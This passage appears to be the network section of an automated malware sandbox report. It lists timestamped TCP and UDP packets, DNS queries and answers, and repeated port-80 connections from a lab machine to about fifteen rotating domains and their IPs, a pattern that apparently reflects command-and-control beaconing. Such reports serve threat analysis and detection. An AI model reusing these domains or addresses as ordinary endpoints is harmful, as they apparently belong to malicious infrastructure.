                                                      Aug 18, 2024 18:26:25.374500990 CEST5413680192.168.2.9203.161.55.102
                                                      Aug 18, 2024 18:26:25.374541044 CEST5413680192.168.2.9203.161.55.102
                                                      Aug 18, 2024 18:26:26.034636021 CEST5413680192.168.2.9203.161.55.102
                                                      Aug 18, 2024 18:26:27.053045034 CEST5413780192.168.2.9203.161.55.102
                                                      Aug 18, 2024 18:26:27.057979107 CEST8054137203.161.55.102192.168.2.9
                                                      Aug 18, 2024 18:26:27.058053017 CEST5413780192.168.2.9203.161.55.102
                                                      Aug 18, 2024 18:26:27.060240984 CEST5413780192.168.2.9203.161.55.102
                                                      Aug 18, 2024 18:26:27.065102100 CEST8054137203.161.55.102192.168.2.9
                                                      Aug 18, 2024 18:26:27.065500975 CEST8054137203.161.55.102192.168.2.9
                                                      Aug 18, 2024 18:26:27.651304007 CEST8054137203.161.55.102192.168.2.9
                                                      Aug 18, 2024 18:26:27.651396990 CEST8054137203.161.55.102192.168.2.9
                                                      Aug 18, 2024 18:26:27.651468039 CEST5413780192.168.2.9203.161.55.102
                                                      Aug 18, 2024 18:26:28.573559046 CEST5413780192.168.2.9203.161.55.102
                                                      Aug 18, 2024 18:26:29.584845066 CEST5413880192.168.2.9203.161.55.102
                                                      Aug 18, 2024 18:26:29.589844942 CEST8054138203.161.55.102192.168.2.9
                                                      Aug 18, 2024 18:26:29.589956999 CEST5413880192.168.2.9203.161.55.102
                                                      Aug 18, 2024 18:26:29.592091084 CEST5413880192.168.2.9203.161.55.102
                                                      Aug 18, 2024 18:26:29.597027063 CEST8054138203.161.55.102192.168.2.9
                                                      Aug 18, 2024 18:26:30.196692944 CEST8054138203.161.55.102192.168.2.9
                                                      Aug 18, 2024 18:26:30.196715117 CEST8054138203.161.55.102192.168.2.9
                                                      Aug 18, 2024 18:26:30.196897030 CEST5413880192.168.2.9203.161.55.102
                                                      Aug 18, 2024 18:26:30.202904940 CEST5413880192.168.2.9203.161.55.102
                                                      Aug 18, 2024 18:26:30.211704016 CEST8054138203.161.55.102192.168.2.9
                                                      Aug 18, 2024 18:26:35.618905067 CEST5413980192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:35.624000072 CEST8054139216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:35.624130011 CEST5413980192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:35.626837015 CEST5413980192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:35.632114887 CEST8054139216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:36.533597946 CEST8054139216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:36.534821033 CEST8054139216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:36.534944057 CEST5413980192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:37.126818895 CEST5413980192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:38.145539045 CEST5414080192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:38.150511980 CEST8054140216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:38.150595903 CEST5414080192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:38.152477980 CEST5414080192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:38.157421112 CEST8054140216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:39.070369005 CEST8054140216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:39.070461035 CEST8054140216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:39.070555925 CEST5414080192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:39.658163071 CEST5414080192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:40.678090096 CEST5414180192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:40.683013916 CEST8054141216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:40.683115959 CEST5414180192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:40.685551882 CEST5414180192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:40.690392017 CEST8054141216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:40.691701889 CEST8054141216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:41.584238052 CEST8054141216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:41.642626047 CEST5414180192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:41.802833080 CEST8054141216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:41.802923918 CEST5414180192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:42.189611912 CEST5414180192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:43.216531992 CEST5414280192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:43.376415014 CEST8054142216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:43.378669977 CEST5414280192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:43.384511948 CEST5414280192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:43.389389992 CEST8054142216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:44.311353922 CEST8054142216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:44.312532902 CEST8054142216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:44.312609911 CEST5414280192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:44.321141005 CEST5414280192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:44.326077938 CEST8054142216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:49.981426001 CEST5414380192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:49.986340046 CEST805414335.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:49.986649990 CEST5414380192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:49.988517046 CEST5414380192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:49.993316889 CEST805414335.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:50.632245064 CEST805414335.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:50.634627104 CEST805414335.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:50.635505915 CEST5414380192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:50.636929989 CEST805414335.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:50.637026072 CEST5414380192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:51.502561092 CEST5414380192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:52.522236109 CEST5414480192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:52.527239084 CEST805414435.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:52.527316093 CEST5414480192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:52.529439926 CEST5414480192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:52.537013054 CEST805414435.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:53.193691015 CEST805414435.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:53.197258949 CEST805414435.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:53.197381020 CEST5414480192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:53.197634935 CEST805414435.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:53.197736025 CEST5414480192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:54.033174992 CEST5414480192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:55.051989079 CEST5414580192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:55.056978941 CEST805414535.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:55.057187080 CEST5414580192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:55.059035063 CEST5414580192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:55.063927889 CEST805414535.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:55.064085960 CEST805414535.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:55.734154940 CEST805414535.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:55.739684105 CEST805414535.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:55.739806890 CEST805414535.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:55.739872932 CEST5414580192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:56.564409971 CEST5414580192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:57.584523916 CEST5414680192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:57.589888096 CEST805414635.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:57.590130091 CEST5414680192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:57.592564106 CEST5414680192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:57.599262953 CEST805414635.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:58.234942913 CEST805414635.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:58.248225927 CEST805414635.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:58.248235941 CEST805414635.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:58.248260975 CEST805414635.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:58.248270035 CEST805414635.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:58.248286009 CEST805414635.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:58.248296022 CEST5414680192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:58.248389006 CEST5414680192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:58.249172926 CEST805414635.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:58.249284029 CEST5414680192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:58.252698898 CEST5414680192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:58.257538080 CEST805414635.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:27:03.364505053 CEST5414780192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:03.369508982 CEST805414776.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:03.372464895 CEST5414780192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:03.377296925 CEST5414780192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:03.382436991 CEST805414776.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:03.862488031 CEST805414776.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:03.862811089 CEST5414780192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:04.892608881 CEST5414780192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:05.343642950 CEST5414780192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:05.806216002 CEST805414776.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:05.806291103 CEST805414776.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:05.807148933 CEST5414780192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:05.950576067 CEST5414880192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:05.955523968 CEST805414876.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:05.957014084 CEST5414880192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:05.989432096 CEST5414880192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:05.994447947 CEST805414876.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:06.426083088 CEST805414876.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:06.426141024 CEST5414880192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:07.501991987 CEST5414880192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:07.506834984 CEST805414876.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:08.522063017 CEST5414980192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:08.527074099 CEST805414976.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:08.527184963 CEST5414980192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:08.529903889 CEST5414980192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:08.534822941 CEST805414976.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:08.537163973 CEST805414976.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:09.313900948 CEST805414976.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:09.314070940 CEST5414980192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:09.316066027 CEST805414976.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:09.316356897 CEST5414980192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:10.035109997 CEST5414980192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:10.041671038 CEST805414976.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:11.055531025 CEST5415080192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:11.060589075 CEST805415076.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:11.064821959 CEST5415080192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:11.067992926 CEST5415080192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:11.073295116 CEST805415076.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:11.524272919 CEST805415076.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:11.524342060 CEST805415076.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:11.524512053 CEST5415080192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:11.544930935 CEST5415080192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:11.549698114 CEST805415076.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:25.128078938 CEST5415180192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:25.133033037 CEST8054151116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:25.133285046 CEST5415180192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:25.135858059 CEST5415180192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:25.141717911 CEST8054151116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:26.642647028 CEST5415180192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:26.692092896 CEST8054151116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:27.662348986 CEST5415280192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:27.668653965 CEST8054152116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:27.673480034 CEST5415280192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:27.675473928 CEST5415280192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:27.683855057 CEST8054152116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:29.189423084 CEST5415280192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:29.236022949 CEST8054152116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:30.208553076 CEST5415380192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:30.219846010 CEST8054153116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:30.219921112 CEST5415380192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:30.222593069 CEST5415380192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:30.227719069 CEST8054153116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:30.227755070 CEST8054153116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:31.736326933 CEST5415380192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:31.784240961 CEST8054153116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:32.755820990 CEST5415480192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:32.760878086 CEST8054154116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:32.760993004 CEST5415480192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:32.762904882 CEST5415480192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:32.767898083 CEST8054154116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:46.512161016 CEST8054151116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:46.516706944 CEST5415180192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:49.093353033 CEST8054152116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:49.095045090 CEST5415280192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:51.603302002 CEST8054153116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:51.603377104 CEST5415380192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:54.135464907 CEST8054154116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:54.136691093 CEST5415480192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:54.137547016 CEST5415480192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:54.142442942 CEST8054154116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:59.671720028 CEST5415580192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:59.677953959 CEST8054155116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:59.678047895 CEST5415580192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:59.680413008 CEST5415580192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:59.690181971 CEST8054155116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:28:01.299489021 CEST5415580192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:28:01.348026991 CEST8054155116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:28:02.318007946 CEST5415680192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:28:02.322930098 CEST8054156116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:28:02.323009014 CEST5415680192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:28:02.324917078 CEST5415680192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:28:02.329765081 CEST8054156116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:28:03.830528021 CEST5415680192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:28:03.976406097 CEST8054156116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:28:06.474469900 CEST5415780192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:28:06.479509115 CEST8054157116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:28:06.479609966 CEST5415780192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:28:06.481605053 CEST5415780192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:28:06.486584902 CEST8054157116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:28:06.486711979 CEST8054157116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:28:07.986583948 CEST5415780192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:28:08.035990953 CEST8054157116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:28:09.004992962 CEST5415880192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:28:09.010077000 CEST8054158116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:28:09.010175943 CEST5415880192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:28:09.012103081 CEST5415880192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:28:09.017554045 CEST8054158116.213.43.190192.168.2.9

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Aug 18, 2024 18:24:17.118055105 CEST53511021.1.1.1192.168.2.9
                                                      Aug 18, 2024 18:24:30.618527889 CEST5364410162.159.36.2192.168.2.9
                                                      Aug 18, 2024 18:24:31.101943970 CEST5797953192.168.2.91.1.1.1
                                                      Aug 18, 2024 18:24:31.109342098 CEST53579791.1.1.1192.168.2.9
                                                      Aug 18, 2024 18:24:39.842888117 CEST5695153192.168.2.91.1.1.1
                                                      Aug 18, 2024 18:24:40.017956018 CEST53569511.1.1.1192.168.2.9
                                                      Aug 18, 2024 18:24:56.584642887 CEST5106653192.168.2.91.1.1.1
                                                      Aug 18, 2024 18:24:57.105564117 CEST53510661.1.1.1192.168.2.9
                                                      Aug 18, 2024 18:25:10.618598938 CEST5026953192.168.2.91.1.1.1
                                                      Aug 18, 2024 18:25:10.826087952 CEST53502691.1.1.1192.168.2.9
                                                      Aug 18, 2024 18:25:24.145337105 CEST5762053192.168.2.91.1.1.1
                                                      Aug 18, 2024 18:25:24.229363918 CEST53576201.1.1.1192.168.2.9
                                                      Aug 18, 2024 18:25:38.255548954 CEST5613953192.168.2.91.1.1.1
                                                      Aug 18, 2024 18:25:38.343326092 CEST53561391.1.1.1192.168.2.9
                                                      Aug 18, 2024 18:25:51.646842003 CEST6482353192.168.2.91.1.1.1
                                                      Aug 18, 2024 18:25:51.663258076 CEST53648231.1.1.1192.168.2.9
                                                      Aug 18, 2024 18:26:08.475060940 CEST4971553192.168.2.91.1.1.1
                                                      Aug 18, 2024 18:26:08.495548010 CEST53497151.1.1.1192.168.2.9
                                                      Aug 18, 2024 18:26:21.787889957 CEST5194453192.168.2.91.1.1.1
                                                      Aug 18, 2024 18:26:21.985690117 CEST53519441.1.1.1192.168.2.9
                                                      Aug 18, 2024 18:26:35.209125996 CEST6384153192.168.2.91.1.1.1
                                                      Aug 18, 2024 18:26:35.615653038 CEST53638411.1.1.1192.168.2.9
                                                      Aug 18, 2024 18:26:49.428118944 CEST6370153192.168.2.91.1.1.1
                                                      Aug 18, 2024 18:26:49.976648092 CEST53637011.1.1.1192.168.2.9
                                                      Aug 18, 2024 18:27:03.337238073 CEST4923953192.168.2.91.1.1.1
                                                      Aug 18, 2024 18:27:03.350264072 CEST53492391.1.1.1192.168.2.9
                                                      Aug 18, 2024 18:27:16.559000015 CEST5386753192.168.2.91.1.1.1
                                                      Aug 18, 2024 18:27:16.590339899 CEST53538671.1.1.1192.168.2.9
                                                      Aug 18, 2024 18:27:24.647752047 CEST4979753192.168.2.91.1.1.1
                                                      Aug 18, 2024 18:27:25.124953032 CEST53497971.1.1.1192.168.2.9
                                                      Aug 18, 2024 18:27:59.147308111 CEST6180653192.168.2.91.1.1.1
                                                      Aug 18, 2024 18:27:59.668601036 CEST53618061.1.1.1192.168.2.9

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Aug 18, 2024 18:24:31.101943970 CEST192.168.2.91.1.1.10x664Standard query (0)56.126.166.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                      Aug 18, 2024 18:24:39.842888117 CEST192.168.2.91.1.1.10x4d5fStandard query (0)www.stemfiniti.comA (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:24:56.584642887 CEST192.168.2.91.1.1.10x2053Standard query (0)www.zhuan-tou.comA (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:25:10.618598938 CEST192.168.2.91.1.1.10x1fcStandard query (0)www.lecoinsa.netA (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:25:24.145337105 CEST192.168.2.91.1.1.10xd8e4Standard query (0)www.8xbe578.appA (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:25:38.255548954 CEST192.168.2.91.1.1.10xaaddStandard query (0)www.synergon.spaceA (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:25:51.646842003 CEST192.168.2.91.1.1.10xf2ffStandard query (0)www.alanbeanart.comA (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:26:08.475060940 CEST192.168.2.91.1.1.10xa559Standard query (0)www.kacotae.comA (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:26:21.787889957 CEST192.168.2.91.1.1.10xf778Standard query (0)www.slushcafe.topA (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:26:35.209125996 CEST192.168.2.91.1.1.10xef6fStandard query (0)www.a9jcpf.topA (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:26:49.428118944 CEST192.168.2.91.1.1.10x112Standard query (0)www.tqfabxah.comA (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:27:03.337238073 CEST192.168.2.91.1.1.10xf90eStandard query (0)www.rtrpodcast.onlineA (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:27:16.559000015 CEST192.168.2.91.1.1.10xbbbaStandard query (0)www.winkthree.comA (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:27:24.647752047 CEST192.168.2.91.1.1.10xb62Standard query (0)www.mqmsqkw.lolA (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:27:59.147308111 CEST192.168.2.91.1.1.10x69aeStandard query (0)www.lfghtko.lolA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Aug 18, 2024 18:24:31.109342098 CEST1.1.1.1192.168.2.90x664Name error (3)56.126.166.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                      Aug 18, 2024 18:24:40.017956018 CEST1.1.1.1192.168.2.90x4d5fNo error (0)www.stemfiniti.comstemfiniti.comCNAME (Canonical name)IN (0x0001)false
                                                      Aug 18, 2024 18:24:40.017956018 CEST1.1.1.1192.168.2.90x4d5fNo error (0)stemfiniti.com3.33.130.190A (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:24:40.017956018 CEST1.1.1.1192.168.2.90x4d5fNo error (0)stemfiniti.com15.197.148.33A (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:24:57.105564117 CEST1.1.1.1192.168.2.90x2053No error (0)www.zhuan-tou.com38.12.1.29A (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:25:10.826087952 CEST1.1.1.1192.168.2.90x1fcNo error (0)www.lecoinsa.net217.116.0.191A (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:25:24.229363918 CEST1.1.1.1192.168.2.90xd8e4No error (0)www.8xbe578.app8xbe578.appCNAME (Canonical name)IN (0x0001)false
                                                      Aug 18, 2024 18:25:24.229363918 CEST1.1.1.1192.168.2.90xd8e4No error (0)8xbe578.app3.33.130.190A (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:25:24.229363918 CEST1.1.1.1192.168.2.90xd8e4No error (0)8xbe578.app15.197.148.33A (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:25:38.343326092 CEST1.1.1.1192.168.2.90xaaddNo error (0)www.synergon.spacesynergon.spaceCNAME (Canonical name)IN (0x0001)false
                                                      Aug 18, 2024 18:25:38.343326092 CEST1.1.1.1192.168.2.90xaaddNo error (0)synergon.space109.95.158.127A (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:25:51.663258076 CEST1.1.1.1192.168.2.90xf2ffNo error (0)www.alanbeanart.comalanbeanart.comCNAME (Canonical name)IN (0x0001)false
                                                      Aug 18, 2024 18:25:51.663258076 CEST1.1.1.1192.168.2.90xf2ffNo error (0)alanbeanart.com3.33.130.190A (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:25:51.663258076 CEST1.1.1.1192.168.2.90xf2ffNo error (0)alanbeanart.com15.197.148.33A (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:26:08.495548010 CEST1.1.1.1192.168.2.90xa559No error (0)www.kacotae.com64.226.69.42A (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:26:21.985690117 CEST1.1.1.1192.168.2.90xf778No error (0)www.slushcafe.top203.161.55.102A (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:26:35.615653038 CEST1.1.1.1192.168.2.90xef6fNo error (0)www.a9jcpf.topkmdne.ajunsdfancsda.comCNAME (Canonical name)IN (0x0001)false
                                                      Aug 18, 2024 18:26:35.615653038 CEST1.1.1.1192.168.2.90xef6fNo error (0)kmdne.ajunsdfancsda.com216.83.33.145A (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:26:35.615653038 CEST1.1.1.1192.168.2.90xef6fNo error (0)kmdne.ajunsdfancsda.com216.83.33.141A (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:26:35.615653038 CEST1.1.1.1192.168.2.90xef6fNo error (0)kmdne.ajunsdfancsda.com216.83.33.189A (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:26:35.615653038 CEST1.1.1.1192.168.2.90xef6fNo error (0)kmdne.ajunsdfancsda.com216.83.33.143A (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:26:35.615653038 CEST1.1.1.1192.168.2.90xef6fNo error (0)kmdne.ajunsdfancsda.com216.83.33.140A (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:26:49.976648092 CEST1.1.1.1192.168.2.90x112No error (0)www.tqfabxah.com35.241.42.217A (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:27:03.350264072 CEST1.1.1.1192.168.2.90xf90eNo error (0)www.rtrpodcast.onlinertrpodcast.onlineCNAME (Canonical name)IN (0x0001)false
                                                      Aug 18, 2024 18:27:03.350264072 CEST1.1.1.1192.168.2.90xf90eNo error (0)rtrpodcast.online76.223.67.189A (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:27:03.350264072 CEST1.1.1.1192.168.2.90xf90eNo error (0)rtrpodcast.online13.248.213.45A (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:27:16.590339899 CEST1.1.1.1192.168.2.90xbbbaName error (3)www.winkthree.comnonenoneA (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:27:25.124953032 CEST1.1.1.1192.168.2.90xb62No error (0)www.mqmsqkw.lol116.213.43.190A (IP address)IN (0x0001)false
                                                      Aug 18, 2024 18:27:59.668601036 CEST1.1.1.1192.168.2.90x69aeNo error (0)www.lfghtko.lol116.213.43.190A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • www.stemfiniti.com
